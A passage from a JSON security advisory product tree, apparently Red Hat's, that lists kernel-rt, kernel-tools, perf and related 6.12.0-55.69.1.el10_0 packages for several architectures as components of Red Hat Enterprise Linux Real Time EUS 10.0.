"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
